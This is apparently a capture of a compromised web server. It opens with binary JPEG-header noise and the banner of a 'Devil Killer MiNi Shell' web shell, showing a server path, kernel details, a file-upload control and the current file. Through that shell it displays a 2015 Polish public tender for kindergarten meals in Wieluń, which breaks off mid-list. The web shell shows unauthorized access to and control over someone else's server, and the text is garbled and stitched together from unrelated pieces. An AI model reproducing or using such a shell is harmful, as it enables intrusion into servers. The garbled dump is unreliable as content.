JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150611/140344-N-2015.html

<p class="kh_header"><b>Wieluń: Zapewnienie posiłków dla dzieci Publicznego Przedszkola nr 1 w Wieluniu</b><br>
<b>Numer ogłoszenia: 140344 - 2015; data zamieszczenia: 11.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Przedszkole Nr 1 , ul. Wodna 4, 98-300 Wieluń, woj. łódzkie, tel. 0-43 843 42 52.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip-przedszk1.um.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zapewnienie posiłków dla dzieci Publicznego Przedszkola nr 1 w Wieluniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zapewnienie posiłków dla dzieci Publicznego Przedszkola nr 1 w Wieluniu, ul. Wodna 4 w ilości około 147 szt. tj. Grupa przedszkolna (3-5 lat): - 111 szt zapotrzebowanie na posiłki trzydaniowe (śniadanie, obiad z kompotem i surówką, podwieczorek) - 16 szt zapotrzebowanie na posiłki dwudaniowe (śniadanie, obiad z kompotem i surówką) Grupa żłobkowa (1-3 lata): - 20 szt zapotrzebowanie na posiłki trzydaniowe (śniadanie, obiad z kompotem i surówką, podwieczorek). Wykonawca zobowiązany będzie do sukcesywnego świadczenia usług w terminie funkcjonowania przedszkola w roku szkolnym, począwszy od dnia 1 września 2015 r. do dnia 31 sierpnia 2017 r. Wymagane jest dostarczanie posiłków dwa i trzy razy dziennie: śniadanie od godz. 8.30 do godz. 9.00, obiad od godz. 11.00 do godz. 11.30, podwieczorek od godz.13.30 do godz. 14.00. Liczbę dzieci korzystających z posiłków należy traktować orientacyjne. Może ona ulegać niewielkim wahaniom w ciągu roku, a także całego okresu realizacji zamówienia. Uzależnione jest to od liczby dzieci zapisujących się corocznie do przedszkola, a także od frekwencji samych dzieci na zajęciach w przedszkolu. Frekwencja za ostatni okres rozliczeniowy wyniosła około 70 %. W związku z tym liczba dzieci korzystających z posiłków w przedszkolu może ulec zmniejszeniu. Podana ilość posiłków jest orientacyjna i służy jedynie do celu sporządzenia kalkulacji i dokonania oceny ofert i nie może stanowić podstawy do roszczeń Wykonawcy w stosunku do Zamawiającego. Żywienie dzieci w przedszkolu powinno odbywać się na następujących zasadach: 1) przygotowanie całodziennych posiłków zgodnie z zalecanymi normami żywieniowymi dla grup wiekowych dzieci przedszkolnych (wiek 3-6 lat) oraz grupy żłobkowej (1-3 lat), przewidywana ilość posiłków - około 147 szt. dziennie; 2) przygotowanie posiłków dla dzieci może odbywać się z wykorzystaniem zaplecza kuchennego przedszkola lub posiłki mogą być dostarczane z zewnątrz: a) w przypadku korzystania z zaplecza kuchennego przedszkola wymagać się będzie od Wykonawcy zawarcia umowy z Zamawiającym na wynajem pomieszczeń zaplecza kuchennego. Czynsz za najem oraz opłaty za zużyte media określone są we wzorze Umowy Najmu - załącznik nr 11 do SIWZ, która reguluje zasady najmu oraz odpowiedzialność za powierzone mienie. Wykonawca powinien dokonać wizji lokalnej w przyszłym miejscu realizowania umowy, aby dokonać właściwej oceny wyposażenia technicznego zaplecza kuchennego przedszkola i stwierdzenia konieczności doposażenia go w dodatkowy sprzęt przez Wykonawcę i na jego koszt. Właścicielem zakupionego sprzętu jest Wykonawca. Na Najemcy ciążyć będzie obowiązek dokonania wszelkich uzgodnień i uzyskania wszelkich zezwoleń związanych z profilem prowadzonej działalności gospodarczej - od urzędów nadzoru państwowego takich jak SANEPID, PIH, PIP, a także innych, nakazanych obowiązującymi przepisami prawa oraz ponoszenia wszelkich, związanych z tym kosztów. Wykonawca podejmuje decyzję o przygotowywaniu posiłków na terenie placówki na cały okres zamówienia. Rezygnacja Wykonawcy z przygotowywania posiłków na terenie placówki w trakcie realizacji zamówienia będzie równoznaczna z rozwiązaniem umowy oraz rozumiana jako odstąpienie od umowy przez Zamawiającego z przyczyn za które ponosi odpowiedzialność Wykonawca oraz będzie skutkować naliczeniem kary umownej, b) w przypadku dostarczania posiłków z zewnątrz gorące posiłki należy dostarczać w termosach, zapewniających temperaturę żywności zgodną z wymogami, tzn. minimalna temperatura zupy winna wynosić 75 C, drugiego dania 65 C, płynów 80 C, a maksymalna temperatura produktów zimnych (sałatki, pasty, sery itp.) 15 C; 3) Wykonawca musi dysponować pojazdem posiadającym wymagane zgody na transport produktów żywienia; 4) wymagane jest dostarczanie posiłków: a) trzy razy dziennie - śniadania, obiady (dwudaniowe), podwieczorek, w godzinach: śniadanie - od 8.30 do 9.00, obiad - od 11. 00 do 11.30, podwieczorek - od 13.30 do 14.00, b) dwa razy dziennie - śniadania, obiady (dwudaniowe), w godzinach: śniadanie - od 8.30 do 9.00, obiad - od 11.00 do 11.30, c) raz dziennie - dostarczanie ciepłych napojów takich jak herbata, kompot, itp. a w sezonie letnim woda niegazowana wydawana dzieciom pomiędzy śniadaniem i obiadem oraz obiadem i podwieczorkiem; 5) posiłki muszą być dostarczane codziennie przez 5 dni w tygodniu, przez 10,5 miesiąca w roku kalendarzowym, z wyłączeniem dni wolnych od zajęć przedszkolnych; 6) Zamawiający zapewnia naczynia, mycie i sprzątanie naczyń po posiłkach przez personel przedszkola; 7) Wykonawca zapewnia mycie termosów i innych pojemników, w których transportowana jest żywność, odpowiada za właściwy stan sanitarny podczas transportu posiłków; 8) Wykonawca zapewnia rozdysponowanie posiłków dla poszczególnych grup w odpowiedniej ilości, rozdysponowanie posiłków w grupie zapewnia Zamawiający; 9) Wykonawca zapewnia we własnym zakresie sprzęt do przechowywania i transportu posiłków; Posiłki dostarczane przez Wykonawcę winny być transportowane w odpowiednich, przeznaczonych do tego celu pojemnikach termoizolacyjnych wykonanych z tworzywa zabezpieczających posiłki przed wylaniem oraz schłodzeniem: termosy jednoskładnikowe przeznaczone do transportu gorących posiłków (zupa, gorące napoje), termosy wieloskładnikowe wypełnione pojemnikami, które występują w różnej konfiguracji i zapewniają dostarczenie na sale poszczególnych części posiłków; 10) Wykonawca zapewnia przygotowanie, dostawę, złożenie posiłków oraz odbiór i utylizację odpadów z Publicznego Przedszkola nr 1 w Wieluniu; 11) posiłki muszą być przygotowywane zgodnie z procedurami niezbędnymi dla zapewnienia bezpieczeństwa żywności i żywienia z uwzględnieniem zapisów określonych w ustawie o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (Dz. U. z 2015 r. poz.594) oraz aktów wykonawczych, a także pozostałych obowiązujących przepisów prawa żywnościowego; 12) posiłki muszą spełniać wymagania norm żywieniowych zgodnie z polskimi normami żywieniowymi dla dzieci w wieku przedszkolnym i wieku żłobkowym. Wykonawca powinien przygotować posiłki o najwyższym standardzie na bazie produktów najwyższej jakości i bezpieczeństwa zgodnie z normami HACCP w jakości i konsystencji potraw odpowiednich dla dzieci w wieku od roku do 3 lat oraz od 3 do 5 lat. Nowe normy żywienia stanowią załącznik nr 9 do SIWZ. Przygotowywane posiłki muszą spełniać wymogi żywieniowe norm opracowanych dla danych grup wiekowych tj. dla dzieci w wieku do 3 lat i od 3 do 5 lat opracowanych przez Instytut Żywności i Żywienia w Warszawie. Przy planowaniu posiłków należy uwzględniać zalecaną wartość energetyczną oraz uwzględniać normy produktów każdej z grup, nad czym musi czuwać dietetyk; 13) Zamawiający zastrzega sobie prawo do bieżącej kontroli wykonywanego zamówienia, w tym poprawności sporządzenia i zrealizowania jadłospisów dekadowych przez upoważnionego przez siebie dietetyka. Ogólną kontrolę nad prawidłowością żywienia sprawować będzie Dyrektor Przedszkola nr 1 oraz upoważnione przez niego osoby. 14) ilość i rodzaj wydawanych posiłków w danym dniu dla danej grupy przedszkolnej odbywa się na podstawie dziennego zamówienia sporządzonego przez upoważnionego pracownika przedszkola, (dostarczenie dziennego zapotrzebowania nie później niż do godz. 9.30 w dniu, którego dotyczy zapotrzebowanie, korekty dziennego zapotrzebowania mogą dotyczyć obiadu i podwieczorku); 15) w jadłospisie winno się uwzględnić: a) dla grupy przedszkolnej: Śniadanie: różne zupy mleczne (płatki kukurydziane, ryżowe, suchary, biszkopty, zacierki, płatki jęczmienne, owsiane, kasza manna, kukurydziana, jaglana bez produktów typu kulki miodowe) do tego kanapki w zależności od rodzaju obiadu z jajkiem, serem białym, żółtym, topionym ( ograniczone ilości), wędlina (wysokiej jakości), szynka, jajecznica ze szczypiorkiem, kiełbaski na gorąco z wyłączeniem parówek, zielenina (pomidor, ogórek kiszony, świeży, sałata, szczypior, rzodkiewka), kakao, herbata owocowa, kanapki - zgodnie z zaleceniami dekadowymi - pieczywo razowe, wieloziarniste i pszenne; Obiad: surówki, ziemniaki, kasza gryczana, kasza jęczmienna, makaron w tym makarony pełnoziarniste) posiłki mięsne (udo z kurczaka bez skóry, sztuka mięsa (filet z kurczaka, indyka, szynka b.k), kotlety schabowe (schab, filet z indyka) gulasz (szynka b.k , karczek b.k, łopatka b.k, filet z indyka, kurczaka) posiłki pół-mięsne ( gołąbki, spaghetti) 2 posiłki bezmięsne - mączne (pierogi, kluski), ryba (np. filet z mintaja) z wyłączeniem mielonej ryby, kotletów rybnych, paluszków rybnych, warzywa: szpinak, buraki, marchewka, groszek zielony, brokuły, kalafior. Kompoty z owoców mrożonych i świeżych kompoty nie ze sztucznych syropów wysoko słodzonych z proszku. ( np. truskawki, wiśnie, maliny, jagody, wieloowocowe, ). Podwieczorek: 1 x w dekadzie bułka słodka (jagodzianka, z budyniem, serem, makiem, jabłkiem, marmoladą), kanapki z wędliną, jajkiem, serem białym, żółtym, bułka maślana z miodem, dżemem i kakao, koktajle owocowe z owoców mrożonych, sezonowych- truskawki, jagody, maliny), chałka z miodem, dżemem lub krem czekoladowo-orzechowy, budyń z rodzynkami, sokiem, - soki owocowe wysokojakościowe nierozcieńczane: pomarańczowy, bananowy, multiwitamina, jabłkowy, karotka, jogurty, kisiele, galaretki i desery owocowe, serek wiejski, kanapki - zgodnie z zaleceniami dekadowymi - pieczywo razowe, wieloziarniste i pszenne. Jogurt naturalny z owocami, jogurty smakowe, sałatka owocowa. Do posiłków dodatek sezonowych warzyw i owoców, zróżnicowane potrawy mięsne, zróżnicowane napoje na bazie mleka; b) dla grupy żłobkowej: Śniadanie: Zupa mleczna: kasza manna, ryż na mleku, kluseczki z mlekiem, kluski lane na mleku, zacierka na mleku. Kaszki mleczno - ryżowe, pszenno - mleczne, płatki kukurydziane. Kanapka: pieczywo mieszane, bułki (2x w tyg.), pieczywo tostowe. Chuda wędlina, ser biały, ser żółty, serek topiony, serek biały smakowy, pasty: jajeczna, rybna. Ser biały z rzodkiewką i szczypiorkiem lub ogórkiem (wszystko tarte). Pomidor, ogórek, sałata, Kiełbaski na gorąco z wyłączeniem parówek, jajecznica ze szczypiorkiem, jajko Dżem, miód. Napoje: herbata z cytryną, owocowa, kakao, kawa zbożowa. Obiad: zupa i II danie: ziemniaki, kasze (kaszka kus-kus, gryczana, jęczmienna). Chude mięso, drób, ryby, wątróbka drobiowa. Warzywa: szpinak, buraki, marchewka, groszek zielony, brokuły, kalafior. Naleśnik z serem, ze szpinakiem, owocami, kluski leniwe z bułką tartą i masłem, łazanki z mięsem i kapustą kiszoną, spaghetti z mięsem, kluski z serem i ze śmietaną, kotlet ziemniaczany w sosie, ryż zapiekany z jabłkiem. Napoje: Kompoty z owoców mrożonych i świeżych ( np. truskawki, wiśnie, maliny, jabłka, jagody, wieloowocowe), kompoty nie ze sztucznych syropów wysoko słodzonych z proszku.), herbata z cytryną, herbata owocowa, rumianek. Minimum raz w tygodniu ryba, dwa razy w tygodniu posiłek mięsny, do każdego posiłku surówka, kompot. Podwieczorek: Kisiel z jabłkiem, budyń, mus owocowy z kaszką mleczną, kasza manna na gęsto z sokiem, serek waniliowy z owocami ( jagody, maliny). Biszkopty, chrupki kukurydziane, herbatniki, Chałka, 1/2  bułki słodkiej, ciasto drożdżowe, biszkoptowe. Napoje: mleko, herbata owocowa, ziołowa. Musy owocowe: jabłko, banan, gruszka, brzoskwinia. Jogurt naturalny z owocami, jogurty smakowe, sałatka owocowa. 16) do przygotowywania posiłków należy używać produktów wysokiej jakości i zawsze świeżych, posiadających aktualne terminy ważności, nabytych w źródłach działających zgodnie z obowiązującymi przepisami sanitarnymi i higienicznymi; 17) posiłki muszą posiadać odpowiednią temperaturę, zgodną z wymogami, tzn. minimalna temperatura zupy winna wynosić 75 C, drugiego dania 65 C, płynów 80 C, a maksymalna temperatura produktów zimnych (sałatki, pasty, sery itp.) 15 C; proces produkcji oraz dystrybucji odbywać musi się zgodnie z wymogami sanitarnymi, zwłaszcza z wymogami dobrej praktyki higienicznej; 18) Zamawiający wymagać będzie od Wykonawcy, aby w ramach realizowanego zamówienia zapewniał posiłki dla grupy dzieci wymagających specjalnej diety (np. posiłki z zaleceniami diety bezmlecznej i bezglutenowej, ze skazą białkową, z dietą cukrzycową, z alergią pokarmową oraz z innymi schorzeniami pokarmowymi); 19) Wykonawca powinien zapewnić dla dzieci z grupy żłobkowej (od 1 roku do 3 lat) odpowiednio rozdrobnione i przygotowane posiłki; 20) Zamawiający wymagać będzie od Wykonawcy, aby w ramach realizowanego zamówienia zapewniał dostarczanie ciepłych napojów takich jak herbata, kompot itp. a w sezonie wodę niegazowaną wydawanych dzieciom pomiędzy śniadaniem i obiadem oraz obiadem i podwieczorkiem; 21) w przypadku wyjazdu dzieci przedszkolnych na wycieczkę Wykonawca winien przygotować w ramach środków przeznaczonych na dany dzień żywieniowy tzw. suchy prowiant. O planowanej wycieczce Zamawiający poinformuje Wykonawcę pisemnie lub telefonicznie z 7 dniowym wyprzedzeniem; 22) wymagania dodatkowe: a) należy unikać mięsa przetworzonego na rzecz całych sztuk mięsa, b) w przypadku dań mięsnych należy serwować całe sztuki mięsa. Mięso przerobione (mielone) może się pojawiać sporadycznie zgodnie z zatwierdzonym jadłospisem. c) wymagane jest ograniczenie zastosowania produktów przetworzonych na poczet innych wartościowych składników odżywczych, d) wyklucza się sporządzanie potraw z proszku za wyjątkiem budyniu i kisielu, e) do przygotowania posiłków należy używać masła 82% oraz tłuszczów roślinnych nieutwardzonych, a nie margaryny. Zamawiający nie zezwala również na stosowanie w procesie żywienia produktów masłopodobnych i seropodobnych, soków zagęszczonych. f) nie można używać gotowych produktów np. gołąbki, mrożone pierogi, g) wędliny nie mogą zawierać skrobi i soi, a mięso nie może być mechanicznie odkostnione, h) wyklucza się mięso i przetwory z puszek konserwowych, Zamawiający nie zezwala również na stosowanie w procesie żywienia następujących produktów: konserw, produktów z glutaminianem sodu, parówek o zawartości mięsa poniżej 85%, i) posiłki muszą być sporządzane zgodnie z zasadami racjonalnego żywienia, muszą być zróżnicowane, z pełnowartościowych produktów z zachowaniem właściwej proporcji składników odżywczych, należy zadbać również o urozmaicenie jadłospisów oraz dostosowanie podawanych potraw do rodzajów posiłków w ciągu dnia, j) owoce i warzywa użyte do przygotowania posiłku muszą być świeże lub mrożone - Zamawiający nie dopuszcza możliwości przygotowywania potraw i napojów na bazie suszu. k) zupy muszą być gotowane na wywarze mięsno-warzywnym. Zamawiający nie dopuszcza możliwości serwowania zup przygotowanych na bazie proszku lub wywaru z kości; l) Wymagane jest umiarkowane stosowanie cukru i soli; m) Obróbka termiczna potraw powinna polegać głównie na gotowaniu, pieczeniu i duszeniu, rzadziej na smażeniu; n) Owoce podawane dzieciom mają być w całości - niedopuszczalne jest dzielenie jednego owocu pomiędzy kilkoro dzieci (nie dotyczy owoców typu arbuz, melon). 23) Zamawiający może ustalić szczegółową listę produktów dopuszczonych do stosowania w ramach żywienia zbiorowego w oparciu o przepisy wydane na podstawie ust. 6. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz.594). Powyższe ustalenia będą wiążące dla Wykonawcy. Listę produktów dopuszczonych do stosowania w ramach żywienia zbiorowego w Publicznym Przedszkolu nr 1 zawarto w załączniku nr 10 do SIWZ. 24) na 3 dni przed rozpoczęciem każdej dekady Wykonawca podawał będzie do wiadomości rodziców i personelu zróżnicowane jadłospisy na okres 10 dni (oddzielny dla grupy przedszkolnej i oddzielny dla grupy żłobkowej) zawierające opis posiłku wraz z gramaturą, zatwierdzone przez dietetyka; 25) Wykonawca zapewnia urozmaicenie jadłospisów oraz dostosuje rodzaje podawanych potraw do rangi posiłków w ciągu dnia; 26) w jadłospisach należy uwzględniać dodatki w postaci sezonowych warzyw i owoców oraz okazyjnie potrawy świąteczne; 27) Wykonawca jest zobowiązany do przestrzegania normatywnych wartości energetycznych, wartości odżywczych i smakowych potraw oraz do przygotowywania ich zgodnie z prawnymi regulacjami o warunkach zdrowotnych żywności i żywienia dzieci od 1 do 3 lat oraz od 3 do 5 lat przy równoczesnym zapewnieniu modyfikacji opracowanych jadłospisów przez urozmaicenia, sezonowość; 28) Zamawiający nie dopuszcza, żeby w ciągu 1 dekady (10 dni) wystąpiła powtarzalność tego samego rodzaju posiłku.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium do dnia 19.06.2015 r. do godz. 13.00 w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku posiadania przez Wykonawcę wiedzy i doświadczenia. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania dysponowania odpowiednim potencjałem technicznym. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda udokumentowania dysponowania osobami zdolnymi do wykonania zamówienia: minimum 1 osobą posiadającą wykształcenie gastronomiczne oraz 1 osobą dietetykiem</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania sytuacji ekonomicznej i finansowej. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
